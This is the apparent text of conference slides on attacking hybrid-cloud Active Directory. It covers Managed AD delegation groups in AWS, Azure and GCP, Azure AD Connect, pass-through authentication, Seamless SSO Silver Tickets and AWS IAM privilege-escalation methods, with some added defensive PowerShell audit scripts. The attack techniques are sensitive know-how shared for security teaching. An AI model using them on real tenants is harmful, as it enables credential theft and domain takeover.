ABOUT

* Founder Trimarc (Trimarc.io), a professional services company that helps organizations better secure their Microsoft platform, including the Microsoft Cloud and VMWare Infrastructure.
* Microsoft Certified Master (MCM) Directory Services
* Microsoft MVP (2017, 2019, & 2020)
* Speaker: Black Hat, Blue Hat, BSides, DEF CON, DEF CON Cloud Village Keynote, DerbyCon, Shakacon, Sp4rkCon
* Security Consultant / Researcher
* Active Directory Enthusiast - Own & Operate ADSecurity.org (Microsoft platform security info)
AGENDA

* Hybrid Cloud
* The Cloud & Virtualization
* Compromising Domain Controllers (On-Prem)
* Cloud Hosted/Managed Active Directory
  * Amazon AWS
  * Microsoft Azure
  * Google Cloud Platform (GCP)
* Attacking Hybrid Components
* Cloud Administration (IAM)
* Compromising On-Prem Domain Controllers Hosted in the Cloud - AWS & Azure
* Conclusion
What is Hybrid Cloud?

* Blend of on-prem infrastructure combined with cloud services.
* Typically on-prem infrastructure with some cloud hosted infrastructure (IaaS) and services (SaaS).
* Connection points between on-prem and cloud often don't focus on security.
Hybrid Cloud Scenarios

* On-Prem AD with Office 365 Services (SaaS)
  * Office 365 hosts mailboxes with authentication performed by Active Directory on-prem.
* Cloud Datacenter
  * Extending the datacenter to the cloud leveraging Azure and/or Amazon AWS (IaaS).
* On-Prem AD with Cloud Hosted AD as Resource Forest
  * Trust between on-prem AD and cloud hosted AD
* Combination of these (or other)
The Cloud & Virtualization
Conceptually The Cloud is Virtualization (effectively)

* Cloud provider Infrastructure as a Service (IaaS) architecture and configuration
* Amazon AWS architecture to host VMs (instances) has leveraged Xen and more recently (2018) Amazon's Nitro (based off the KVM core kernel).
* Azure leverages a customized version of Hyper-V (core) to host Azure VMs.
* Google Cloud Platform (GCP) uses KVM for virtualization.
* There is a cloud "fabric" that ties the "virtualization" component with orchestration (and storage, network, etc).

Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com

[Figure: Azure n-tier Windows VM reference architecture (subnet layout); source: docs.microsoft.com reference-architectures/n-tier/windows-vm]
[Figure: AWS availability zone diagram]

[Figure: Access Office 365 with AWS Managed Microsoft AD: AD Administration Tools Server, AD FS Server (Windows Server 2016) and Azure AD Connect Server joined to AWS Microsoft AD; source: https://aws.amazon.com/blogs/security/how-to-enable-your-users-to-access-office-365-with-aws-microsoft-active-directory-credentials/]
VMWare Cloud on AWS

[Figure: VMware Cloud on AWS building blocks: vSphere, vSAN, Amazon Redshift, AWS Direct Connect; source: https://aws.amazon.com/blogs/apn/diving-deep-on-the-foundational-blocks-of-vmware-cloud-on-aws]
Compromising On-Prem Domain Controllers
Physical DCs

* Physical Access
* Out of Band Management (HP iLO)
  * Check for port 2381 on servers for the iLO web service (on the same network, which is bad):

    Test-NetConnection $IPAddress -Port 2381
Airbus Security Identified iLO Security Issues:

* A new exploitation technique that allows compromise of the host server operating system through DMA. Leverage a discovered RCE to exploit an iLO4 feature which allows read-write access to the host memory and inject a payload in the host Linux kernel.
* New vulnerability in the web server to flash a new backdoored firmware.
* The use of the DMA communication channel to execute arbitrary commands on the host system.
* iLO (4/5) CHIF channel interface opens a new attack surface, exposed to the host (even though iLO is set as disabled). Exploitation of CVE-2018-7078 could allow flashing a backdoored firmware from the host through this interface.
* We discovered a logic error (CVE-2018-7113) in the kernel code responsible for the integrity verification of the userland image, which can be exploited to break the chain-of-trust. Related to the new secure boot feature introduced with iLO5 and the HPE Gen10 server line.
* Provide a Go scanner to discover vulnerable servers running iLO
Virtual DCs: VMWare

* Compromise VMWare administration
* Compromise account with VMWare access to Virtual DCs
* Compromise system running vCenter (Windows system or appliance) since this is an administration gateway that owns vSphere
* Identify VMWare ESXi Root account password and use to compromise ESXi hosts (similar to local Administrator account on Windows)
* Connect directly to virtual DCs with the VIX API (via VMWare Tools)
Virtual DCs: Hyper-V

* Compromise members of "Hyper-V Admins" group.
* Compromise server hosting Hyper-V.
* Compromise local admin account on the Hyper-V server (pw may be the same as other servers)
* Compromise account with GPO modify rights to the OU containing Hyper-V servers.
Cloud Hosted/Managed Active Directory

& What this Means to Pentesters & Red Teams
Cloud Hosted/Managed AD

* AD environment spun up per customer by cloud provider
* 100% managed AD by the cloud provider
* Customer does not get Domain Admin rights or access to Domain Controllers
* Amazon AWS, Microsoft Azure, and Google Cloud Platform all host Managed AD environments for customers, with some differences
[Screenshot: AWS Directory Service console, Directory details]
  Directory type: Microsoft AD
  Edition: Standard
  Directory ID: d-9a67273b45
  Directory DNS name: lab.trimarcrd.com
  Directory NetBIOS name: LAB
  Description: Trimarc RD Lab
  Availability zones: us-east-2b, us-east-2a
  DNS address: 172.31.14.175, 172.31.22.253
AWS Directory Service for Microsoft Active Directory

[Screenshot: AWS Directory Service console]
  Status: Creating
  Last updated: Monday, July 20, 2020
  Launch time: Monday, July 20, 2020

[Screenshot: Active Directory Users and Computers [WIN-JBCPOEDSHJG.lab.trimarcrd.com]]
  lab.trimarcrd.com
    AWS Delegated Groups
    AWS Reserved
    Builtin
    Computers
    Domain Controllers
    ForeignSecurityPrincipals
    LAB
      Computers
      Users
    Managed Service Accounts
    Users
AWS Directory Service for Microsoft Active Directory

* 2 DCs running Windows Server 2012 R2 (172.31.14.175 & 172.31.22.253)
* Default domain Administrator account "Administrator" in the "AWS Reserved" OU.
* First account is "Admin" and gains full rights on customer OU
* Customer OU created and rights delegated to AWS Administrators (& default Admin account)
* The domain password policy is default, but the customer has the ability to modify 5 pre-created Fine-grained password policies
* The DC auditing policy is decent except no Kerberos audit policies, so no way to detect Kerberoasting (requires "Audit Kerberos Service Ticket Operations" auditing).
AWS Managed AD - Customer Admin Account

PS C:\Users\admin> get-aduser 'admin' -prop description

Description       : DO NOT DELETE: Provided by AWS for administration of directory objects. This account has FULL CONTROL over the root OU: 'OU=LAB,DC=lab,DC=trimarcrd,DC=com' and group management rights to groups in AWS Delegated Groups OU
DistinguishedName : CN=Admin,OU=Users,OU=LAB,DC=lab,DC=trimarcrd,DC=com
Enabled           : True
GivenName         :
Name              : Admin
ObjectClass       : user
ObjectGUID        : 1408d957-db4b-4355-a714-9ef099bfc6f0
SamAccountName    : Admin
SID               : S-1-5-21-299155490-801632954-1140098970-1113
Surname           :
UserPrincipalName :
AWS Microsoft AD Delegation Groups

* AWS Delegated Administrators group is delegated most rights including:
  * Group Modify rights on the "AWS Delegated Groups" OU
  * "Reanimate-Tombstones" (effectively the ability to undelete objects)
* AWS Delegated Managed Service Account Administrators group is delegated rights to create and manage MSAs
* AWS Delegated Add Workstations To Domain Users added to the "Add workstations to domain" URA on DC GPO
* AWS Delegated Kerberos Delegation Administrators added to "Enable computer and user accounts to be trusted for delegation"
* AWS Delegated Replicate Directory Changes Administrators group is delegated "DS-Replication-Get-Changes" at the domain level
* AWS Delegated Domain Name System Administrators is added to the DNSAdmins group providing DNS administration.
* AWS Delegated Server Administrators group is added to the local Administrators on all computers in the customer OU ("LAB") and child OUs via the GPO "ServerAdmins".
Azure Active Directory Domain Services (Managed AD)

[Screenshot: Active Directory Users and Computers [V0Z1INKOUSQOWRLJ.trimarcrd.com]]
  trimarcrd.com
    AADDC Computers
    AADDC Users
    AADDSDomainAdmin
    AADDSSyncEscrows
    AADDSSyncState
    Builtin
    Computers
    Domain Controllers
    ForeignSecurityPrincipals
    Managed Service Accounts
    Users
Azure AD Domain Services (Managed AD)

* 2 DCs running Windows Server 2012 R2 (10.0.1.4 & 10.0.1.5)
* Default domain Administrator account "dcaasadmin" (default location)
* Initial admin account is an Azure AD account - can select Azure AD accounts (or synched on-prem AD accounts)
* Customer OUs: AADDC Computers & AADDC Users
* 1 Fine-Grained Password Policy (FGPP) called "AADDSSTFPSO"
* Authenticated Users can add computers to the domain
* Event auditing on Managed AD Domain Controllers not configured via GPO, so can't see configuration.
Azure AD DS Delegation Groups

* AAD DC Administrators has the ability to create new OUs (domain)
* AAD DC Administrators is delegated Full Control on:
  * AADDC Computers
  * AADDSSyncEscrows
  * AADDSSyncState
  * Managed Service Accounts
  * Program Data
* AAD DC Administrators has Edit Settings rights on the GPOs:
  * AADDC Computers GPO (linked to OU=AADDC Computers,DC=trimarcrd,DC=com)
  * AADDC Users GPO (linked to OU=AADDC Users,DC=trimarcrd,DC=com)
* The GPO "AADDC Computers GPO" adds AAD DC Administrators to the local Administrators group on computers in the AADDC Computers OU
* AAD DC Service Accounts has DS-Replication-Get-Changes rights


GCP Managed Service for Microsoft Active Directory (Managed Microsoft AD)

[Screenshot: GCP pricing estimate]
  Windows Server 2019 Datacenter Edition Usage Fee
  Google Compute Engine Costs: 2 x VM instance: 2 vCPUs + 7.5 GB memory (n1-standard-2) + 100GB Boot Disk: $165.64/month
  $43.69/month
  $256.27/month

[Screenshot: Managed Microsoft AD console, Basic details]
  Domain Name (FQDN): lab.trimarcrd.com
  Netbios name: lab
  Region health: us-east1
  Labels: None
  Creation time: 7/28/20, 3:52 PM
  Last update time: 7/28/20, 4:28 PM
  Status: Healthy
[Screenshot: Managed Microsoft AD console, Network details]
  Project: neon-fort-284318
  Networks:
  IP CIDR range: 10.10.23.0/24
  Access details
  Admin name: trdadmin
  Password: SET PASSWORD

GCP Managed Microsoft AD

[Screenshot: Active Directory Users and Computers [dc8aae75738eabf.lab.trimarcrd.com]]
  lab.trimarcrd.com
    Builtin
    Cloud
      Computers
    Cloud Service Objects
    Computers
    Domain Controllers
    ForeignSecurityPrincipals
    Managed Service Accounts
    Users
GCP Managed Microsoft AD

* 2 DCs running Windows Server 2019 Datacenter (2012R2 Forest FL)
* The AD Recycle Bin has not been enabled
* Default domain Administrator account "Administrator" (disabled)
* 2nd domain admin account "cloudsvcadmin"
* First account is customer created ("setupadmin" - can be changed)
* The domain password policy is default, but the customer has the ability to create Fine-grained password policies
* Event auditing on Managed AD Domain Controllers not configured via GPO, so can't see configuration.
GCP Managed AD Delegation Groups

* Cloud Service All Administrators
  * Delegated Full Control on all objects (& link GPO rights) in the Cloud OU
* Cloud Service Administrators
  * Member of Cloud Service All Administrators & Group Policy Creator Owners
* Cloud Service Computer Administrators
  * Added to local Administrators group via GPO on Cloud OU
* Cloud Service Managed Service Account Administrators
  * Delegated Full Control on the Managed Service Accounts OU
* Cloud Service DNS Administrators
* Cloud Service Protected Users
* Cloud Service Group Policy Creator Owners
Managed AD Common Themes

* No customer Domain Admin or Domain Controller rights.
* OU(s) are provided for customer use (users, computers, groups, etc.).
* Delegation groups provide AD component management capability to the customer.
* Domain Password Policy is default (7 characters), with the ability to adjust via Fine-Grained Password Policies.
* Azure AD DS & GCP Managed AD both seem to have default Domain Controller GPO settings.
* All provide the ability to configure an AD trust, so you may see the on-prem AD forest trust a Managed AD environment (in the near future).
* Slightly different (or quite different!) approaches are used to provide the same or similar capability.

AD Security Review PowerShell Script: https://trimarc.co/ADCheckScript
Attacking Managed AD

* Determine which Managed AD you are viewing (combination of OU and group names)
* Likely no escalation to Domain Admins, so focus on delegation groups & membership
* Identify default customer admin account.
* Azure AD DS can be managed by Azure AD accounts that are synchronized into Azure AD DS or even on-prem AD accounts synched in from the on-prem Azure AD Connect (through Azure AD) to Azure AD DS. If Password Hash Sync (PHS) is enabled, then the on-prem AD account hash is included.
* Enumerate Managed AD privileged group membership.
* Managed AD typically used & managed by Application Owners who may not realize the rights they do have as members in the Managed AD delegation groups.
* Security auditing may not be configured to detect malicious activity (or sent to SIEM).
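The first two steps above (fingerprint the provider, then review delegation group membership) as an added PowerShell example, not from the talk or the Trimarc script it links; it assumes the RSAT ActiveDirectory module and read access to the Managed AD domain, and the OU and group names it matches on are the ones shown on the preceding slides.

```powershell
# Added example (not from the talk): fingerprint which cloud provider's Managed AD
# you are connected to from the OU / delegation-group naming on the previous slides,
# then list the members of that provider's delegation groups so owners can review
# who actually holds those rights. Requires RSAT ActiveDirectory and domain read access.
Import-Module ActiveDirectory

# Provider signatures taken from the slides: customer/provider OU names and the
# prefix every delegation group of that provider carries.
$Signatures = @(
    @{ Provider = 'AWS Managed Microsoft AD'; OUs = @('AWS Delegated Groups', 'AWS Reserved'); GroupPrefix = 'AWS Delegated *' },
    @{ Provider = 'Azure AD Domain Services'; OUs = @('AADDC Computers', 'AADDC Users');       GroupPrefix = 'AAD DC *' },
    @{ Provider = 'GCP Managed Microsoft AD'; OUs = @('Cloud', 'Cloud Service Objects');      GroupPrefix = 'Cloud Service *' }
)

function Get-ManagedADProvider {
    # Returns the first signature whose OUs all exist, or $null for a self-managed domain.
    $ouNames = Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty Name
    foreach ($sig in $Signatures) {
        $missing = $sig.OUs | Where-Object { $ouNames -notcontains $_ }
        if (-not $missing) { return $sig }
    }
    return $null
}

function Get-ManagedADDelegationMembers {
    param([Parameter(Mandatory)] [hashtable] $Signature)
    # Enumerate every delegation group of the detected provider and expand membership
    # recursively, so nested groups (a common blind spot for application owners) count too.
    $groups = Get-ADGroup -Filter "Name -like '$($Signature.GroupPrefix)'"
    foreach ($g in $groups) {
        $members = @(Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue)
        [pscustomobject]@{
            Group       = $g.Name
            MemberCount = $members.Count
            Members     = ($members | ForEach-Object { $_.SamAccountName }) -join ', '
        }
    }
}

$provider = Get-ManagedADProvider
if ($null -eq $provider) {
    Write-Host 'No Managed AD signature found; this looks like a classic (self-managed) domain.'
} else {
    Write-Host "Detected: $($provider.Provider)"
    # Groups with members are the ones whose rights (local admin via GPO, DNS admin,
    # DS-Replication-Get-Changes, ...) application owners may not realise they hold.
    Get-ManagedADDelegationMembers -Signature $provider |
        Sort-Object MemberCount -Descending |
        Format-Table -AutoSize -Wrap
}
```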
Attacking Hybrid Cloud Components

[Figure: AD Connector authentication flow and network path: the AD Connector in the AWS private network receives user credentials over SSL from the secure sign-in page, performs LDAP authentication against the customer's on-prem AD (192.x), then does IAM role mapping and issuance of temporary credentials; source: https://aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector]
Microsoft Pass-Through Authentication (PTA)

[Figure: Pass-through authentication: the user signs in to Office 365, SaaS and LoB apps through Microsoft Azure Active Directory; password validation requests are sent to Windows Server Active Directory via the pass-through authentication agent, with identity synchronization using Azure AD Connect]
Attacking Microsoft PTA

* Managed by Azure AD Connect
* Compromise server hosting PTA (typically Azure AD Connect server)
* Azure AD sends the clear-text password (not hashed!) to authenticate the user.
* Inject DLL to compromise credentials used for PTA

https://blog.xpnsec.com/azuread-connect-for-redteam/
Azure AD Seamless Single Sign-On

[Figure: Azure AD Seamless SSO overview: user sign-in from an AD domain-joined machine (Contoso Corpnet) to Office 365, SaaS and LoB apps; Azure AD does Kerberos authentication against Windows Server Active Directory, with identity synchronization & managed authentication using Azure AD Connect]

[Figure: Azure AD Seamless SSO flow: the user tries to access the app and is redirected to Azure AD for sign-in; the user enters a username; Azure AD challenges for a Kerberos ticket; the domain-joined device requests a Kerberos ticket from AD, AD returns the ticket, and the browser forwards it to Azure AD; Azure AD decrypts the Kerberos ticket and completes the sign-in process; if successful, the user gets access to the app]

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
Attacking Azure AD Seamless Single Sign-On

* Managed by Azure AD Connect
* "Azure AD exposes a publicly available endpoint that accepts Kerberos tickets and translates them into SAML and JWT tokens"
* Compromise the Azure AD Seamless SSO Computer Account password hash ("AZUREADSSOACC")
* Generate a Silver Ticket for the user you want to impersonate and the service 'aadg.windows.net.nsatc.net'
* Inject this ticket into the local Kerberos cache
* Azure AD Seamless SSO computer account password doesn't
Attacking Azure AD Connect

Permissions for the created AD DS account for express settings

The account created for reading and writing to AD DS has the following permissions when created by express settings:

  Permission                                 Used for
  Replicate Directory Changes                Password sync
  Replicate Directory Changes All            Password sync
  Read/Write all properties User             Import and Exchange hybrid
  Read/Write all properties iNetOrgPerson    Import and Exchange hybrid
  Read/Write all properties Group            Import and Exchange hybrid
  Read/Write all properties Contact          Import and Exchange hybrid
  Reset password                             Preparation for enabling password writeback

DEF CON 25 (July 2017)

On-Prem: Acme's Azure AD Connect

PS C:\> Invoke-ACLScanner -ResolveGUIDs `
    -ADSpath 'DC=theacme,DC=io' `
    | where { ($_.IsInherited -eq $False) -AND `
              ($_.ObjectType -like 'DS-Replication*') } `
    | select ObjectDN,IdentityReference,AccessControlType, `
             ActiveDirectoryRights,ObjectType

ObjectDN              : DC=theacme,DC=io
IdentityReference     : ACME\MSOL_trd977930921
AccessControlType     : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes-All

ObjectDN              : DC=theacme,DC=io
IdentityReference     : ACME\MSOL_trd977930921
AccessControlType     : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes
On-Prem: Acme's Azure AD Connect

PS C:\> get-aduser -filter {samaccountname -like "MSOL*"} -prop DistinguishedName,description | fl *

Description       : Account created by the Window... irectory Sync ...
                    "trd977930921" running on computer "AZURESYNC" configured ...
                    "theacmeio.onmicrosoft.com". This account must have directi...
                    Directory and write permission on certain attributes to en...
DistinguishedName : CN=MSOL_trd977930921,OU=Service Accounts,DC=theacme,DC=io
Enabled           : True
GivenName         :
Name              : MSOL_trd977930921

PS C:\> get-adcomputer AzureSync

DistinguishedName : CN=AZURESYNC,OU=Servers,DC=theacme,DC=io
DNSHostName       :
Enabled           : True
Name              : AZURESYNC
ObjectClass       : computer
On-Prem: Acme's Azure AD Connect

PS C:\> Find-GPOComputerAdmin -OUName 'OU=Servers,DC=theacme,DC=io'

ComputerName   :
ObjectName     :
ObjectDN       :
ObjectSID      :
IsGroup        : True
GPODisplayName : Server Baseline Policy
GPOGuid        : {002404EA-6ACB-495D-97E6-2AEC59ED91A8}
GPOPath        : \\theacme.io\SysVol\theacme.io\Policies\{002404EA-6AC...
GPOType        : GroupPolicyPreferences
On-Prem: Acme's Azure AD Connect

[Screenshot: Group Policy Management, Forest theacme.io, Domains > theacme.io: Default Domain Policy; OUs Accounts, AD Management, Branch Offices, Disabled, Domain Controllers, Groups, Servers (Server Baseline Policy, Server Config), Service Accounts, Workstations. Delegation tab of the "Server Config" GPO, "These groups and users have the specified permission for this GPO":]
  Authenticated Users                            Read (from Security Filtering)
  Domain Admins (ACME\Domain Admins)             Edit settings, delete, modify security
  Enterprise Admins (ACME\Enterprise Admins)     Edit settings, delete, modify security
  ENTERPRISE DOMAIN CONTROLLERS                  Read
  Server Tier 1 (ACME\Server Tier 1)             Edit settings
  Server Tier 2 (ACME\Server Tier 2)             Edit settings
  Server Tier 3 (ACME\Server Tier 3)             Edit settings, delete, modify security
Azure AD Connect Service Account Rights

* Dirk-jan Mollema (@_dirkjan) covers rights that the Azure AD Connect service account has to Azure AD: https://dirkjanm.io/talks/

Fun stuff to do with the Sync account

* Dump all on-premise password hashes (if PHS is enabled)
* Log in on the Azure portal (since it's a user)
* Bypass conditional access policies for admin accounts
* Add credentials to service principals
* Modify service principals properties

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dirk-jan-Mollema-Im-in-your-cloud-pwning-your-azure-environment.pdf
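The ACL review shown on the Acme slides (who holds DS-Replication-Get-Changes and -All on the domain head) as an added PowerShell example that uses only the RSAT AD: drive rather than PowerView; it is not from the talk, and it assumes the ActiveDirectory module and read access to the domain root, with the expected-holder list being an assumption to adjust per environment.

```powershell
# Added example (not from the talk): list every principal with DS-Replication-Get-Changes
# or DS-Replication-Get-Changes-All on the domain head, without PowerView. Only DCs and
# the Azure AD Connect MSOL_* account (when Password Hash Sync is on) normally need both.
# Requires the RSAT ActiveDirectory module (the AD: PSDrive) and read access to the domain.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs for the two replication control-access rights.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
# Identities that hold these rights by default (assumption: adjust to your forest);
# anything else, MSOL_* included, should be explicitly accounted for.
$ExpectedHolders = @('Domain Controllers', 'Enterprise Domain Controllers',
                     'Administrators', 'Enterprise Read-only Domain Controllers')

function Get-DomainReplicationRightHolders {
    param([string] $DomainDN = (Get-ADDomain).DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        # Control-access rights are ExtendedRight ACEs keyed by the ObjectType GUID.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (-not $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) { continue }
        $guid = $ace.ObjectType.ToString().ToLower()
        # The all-zero GUID (e.g. from a GenericAll ACE) grants every extended right, DCSync included.
        $isAll = ($guid -eq '00000000-0000-0000-0000-000000000000')
        if (-not $isAll -and -not $ReplicationRights.ContainsKey($guid)) { continue }
        $right    = if ($isAll) { 'All extended rights' } else { $ReplicationRights[$guid] }
        $identity = $ace.IdentityReference.Value
        $name     = ($identity -split '\\')[-1]
        [pscustomobject]@{
            Identity  = $identity
            Right     = $right
            Inherited = $ace.IsInherited
            Expected  = ($ExpectedHolders -contains $name)
        }
    }
}

# Azure AD Connect names its account MSOL_<installation id>; it is expected only when PHS
# is in use, and the server hosting it (AZURESYNC on the slides) then needs Tier 0 protection.
Get-DomainReplicationRightHolders |
    Sort-Object Expected, Identity |
    Format-Table Identity, Right, Inherited, Expected -AutoSize
```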




Cloud Administration 


Identity Access Management (IAM) 
Cloud Administration & Roles

* Administrative groups are called Roles
* Each role has specifically delegated access.
* Depending on the cloud provider, custom roles can be created with custom delegation and rights.
* Azure and Amazon AWS each have their own methods for this, but the concepts are the same.


Azure IAM - Role Types

* Owner
  * Has full access to all resources including the right to delegate access to others.
* Contributor
  * Can create and manage all types of Azure resources but can't grant access to others.
* Reader
  * Can view existing Azure resources.
Azure IAM - Privileged Roles

* Tenant Admins
  * Owner Role on the Tenant
  * Full control over the tenant and all subscriptions
* Subscription Admin
  * Owner Role on the Subscription
  * Full control over the subscription
Differences between Azure roles and Azure AD roles

At a high level, Azure roles control permissions to manage Azure resources, while Azure AD roles control permissions to manage Azure Active Directory resources. The following table compares some of the differences.

  Azure roles                                          | Azure AD roles
  Manage access to Azure resources                     | Manage access to Azure Active Directory resources
  Supports custom roles                                | Supports custom roles
  Scope can be specified at multiple levels            | Scope is at the tenant level
  (management group, subscription, resource group,     |
  resource)                                            |
  Role information can be accessed in Azure portal,    | Role information can be accessed in Azure admin
  Azure CLI, Azure PowerShell, Azure Resource Manager  | portal, Microsoft 365 admin center, Microsoft
  templates, REST API                                  | Graph, AzureAD PowerShell

Do Azure roles and Azure AD roles overlap?

By default, Azure roles and Azure AD roles do not span Azure and Azure AD. However, if a Global Administrator elevates their access by choosing the Access management for Azure resources switch in the Azure portal, the Global Administrator will be granted the User Access Administrator role (an Azure role) on all subscriptions for a particular tenant.


AWS IAM (Organizations)

* Root Account (Payer Account) - organization primary account (often the first account)
* Account Admins
  * Full control over the Account and everything in the account (account services)
* If Root Account (admin) AND Account Admin = Full organizational control
* No real "subscription" concept
* Organizational Unit concept provides granular admin to sub AWS accounts which can contain any amount of resources and data
AWS IAM Privilege Escalation Methods

* Creating a new policy version (iam:CreatePolicyVersion)
  * This privilege escalation method could allow a user to gain full administrator access of the AWS account.
* Creating an EC2 instance with an existing instance profile (iam:PassRole and ec2:RunInstances)
  * This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
* Creating a new user access key (iam:CreateAccessKey)
  * This method would give an attacker the same level of permissions as any user they were able to create an access key for, which could range from no privilege escalation to full administrator access to the account.
* Create/update new login profile (iam:CreateLoginProfile / iam:UpdateLoginProfile)
  * This method would give an attacker the same level of permissions as any user they were able to create a login profile for, which could range from no privilege escalation to full administrator access to the account.
* Attaching a policy to a user (iam:AttachUserPolicy)
  * An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a user, giving them full administrator access to the AWS environment.
* Attaching a policy to a group (iam:AttachGroupPolicy)
  * An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a group, giving them full administrator access to the AWS environment.
* Attaching a policy to a role (iam:AttachRolePolicy)
  * An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a role, giving them full administrator access to the AWS environment.
* Creating/updating an inline policy for a user (iam:PutUserPolicy)
  * Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
* Creating/updating an inline policy for a group (iam:PutGroupPolicy)
  * Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
* Creating/updating an inline policy for a role (iam:PutRolePolicy)
  * Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full administrator privileges in the AWS environment.
* Adding a user to a group (iam:AddUserToGroup)
  * The attacker would be able to gain privileges of any existing group in the account, which could range from no privilege escalation to full administrator access to the account.
* Updating the AssumeRolePolicyDocument of a role (iam:UpdateAssumeRolePolicy)
  * This would give the attacker the privileges that are attached to any role in the account, which could range from no privilege escalation to full administrator access to the account.

https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.
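A defender-side check for the escalation-capable IAM actions listed above, as an added PowerShell example (not from the talk and not Rhino Security Labs' tool): it takes an IAM policy document and reports which of those actions it allows, including grants hidden behind wildcards such as "iam:*" or "*", honouring explicit Deny. The policy below is constructed for illustration; Resource and Condition elements are deliberately not evaluated, so treat hits as candidates for review.

```powershell
# Added example (not from the talk or Rhino's aws_escalate tool): given an IAM policy
# document, report which of the escalation-capable actions from the slide it allows,
# including grants hidden behind wildcards ("iam:*", "iam:Attach*", "*"). Swap the
# constructed $SamplePolicy for the output of Get-IAMPolicyVersion or
# "aws iam get-policy-version" to check real policies.

# Actions from the slide, keyed to the escalation method each enables.
$EscalationActions = @{
    'iam:CreatePolicyVersion'    = 'new policy version on an attached policy'
    'iam:PassRole'               = 'pass an instance profile/role (with ec2:RunInstances)'
    'ec2:RunInstances'           = 'launch an instance with an existing instance profile'
    'iam:CreateAccessKey'        = 'mint access keys for another user'
    'iam:CreateLoginProfile'     = 'create a console password for another user'
    'iam:UpdateLoginProfile'     = 'reset another user''s console password'
    'iam:AttachUserPolicy'       = 'attach AdministratorAccess to a user'
    'iam:AttachGroupPolicy'      = 'attach AdministratorAccess to a group'
    'iam:AttachRolePolicy'       = 'attach AdministratorAccess to a role'
    'iam:PutUserPolicy'          = 'arbitrary inline policy on a user'
    'iam:PutGroupPolicy'         = 'arbitrary inline policy on a group'
    'iam:PutRolePolicy'          = 'arbitrary inline policy on a role'
    'iam:AddUserToGroup'         = 'join a privileged group'
    'iam:UpdateAssumeRolePolicy' = 'rewrite a role trust policy'
}

function Test-IamActionMatch {
    param([string] $Pattern, [string] $Action)
    # IAM action matching is case-insensitive; '*' and '?' are the only wildcards.
    $regex = '^' + ([regex]::Escape($Pattern) -replace '\\\*', '.*' -replace '\\\?', '.') + '$'
    return ($Action -imatch $regex)
}

function Get-EscalationCapableActions {
    param([Parameter(Mandatory)] [string] $PolicyJson)
    $policy = $PolicyJson | ConvertFrom-Json
    $statements = @($policy.Statement)           # Statement may be one object or an array
    $allowed = @{}; $denied = @{}
    foreach ($st in $statements) {
        if (-not $st.Action) { continue }         # NotAction statements are out of scope here
        foreach ($pattern in @($st.Action)) {     # Action may be a string or an array
            foreach ($action in $EscalationActions.Keys) {
                if (Test-IamActionMatch -Pattern $pattern -Action $action) {
                    if ($st.Effect -eq 'Allow') { $allowed[$action] = $pattern }
                    else                        { $denied[$action] = $true }
                }
            }
        }
    }
    # An explicit Deny always wins over an Allow in IAM policy evaluation.
    # Resource/Condition are not evaluated: every hit is a candidate to review, not a verdict.
    foreach ($action in ($allowed.Keys | Sort-Object)) {
        if ($denied.ContainsKey($action)) { continue }
        [pscustomobject]@{
            Action    = $action
            GrantedBy = $allowed[$action]
            Enables   = $EscalationActions[$action]
        }
    }
}

# Constructed sample: a "developer" policy that looks harmless but grants iam:* outright,
# with only two of the dangerous actions explicitly denied.
$SamplePolicy = @'
{
  "Version": "2012-10-17",
  "Statement": [
    { "Effect": "Allow", "Action": ["s3:*", "ec2:Describe*", "iam:*"], "Resource": "*" },
    { "Effect": "Allow", "Action": "ec2:RunInstances", "Resource": "*" },
    { "Effect": "Deny",  "Action": ["iam:AttachUserPolicy", "iam:CreateAccessKey"], "Resource": "*" }
  ]
}
'@

Get-EscalationCapableActions -PolicyJson $SamplePolicy | Format-Table -AutoSize
```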


Cloud API Keys

* Provide permanent access, often with privileged rights.
* Often provide an additional authentication access method (other than username/password)
* API keys are frequently exposed in code (Github), including private repositories.
* Compromised API keys need to be regenerated.
Compromise Cloud Hosted DCs

Via AWS / Federation

AWS Federated Authentication with Active Directory Federation Services (AD FS)

[Figure: SAML federation between the Enterprise (Identity Provider: ADFS 3.0 and the AD identity store in the corporate data center) and AWS (Service Provider): the user is authenticated by AD FS, which returns a SAML assertion; the browser posts the SAML assertion to AWS Sign-in; AWS STS issues temporary credentials for the mapped IAM Role (with its IAM Policy); the user is redirected to the AWS Management Console; source: https://aws.amazon.com/blogs/security/aws-federated-authentication-with-active-directory-federation-services-ad-fs]
[Figure sequence (animated slides): On-prem AD Domain Controllers hosted in AWS EC2; the on-prem AD group "AWS EC2 Admins" is mapped through Federation to the AWS IAM Role "AWS EC2 Administration", which administers the AWS EC2 instances hosting the on-prem AD Domain Controllers]
On-Prem AD Account -> AWS Federation -> Compromise On-Prem AD Summary

* On-prem AD Domain Controllers are hosted in AWS EC2
* On-prem AD groups are added to AWS Roles

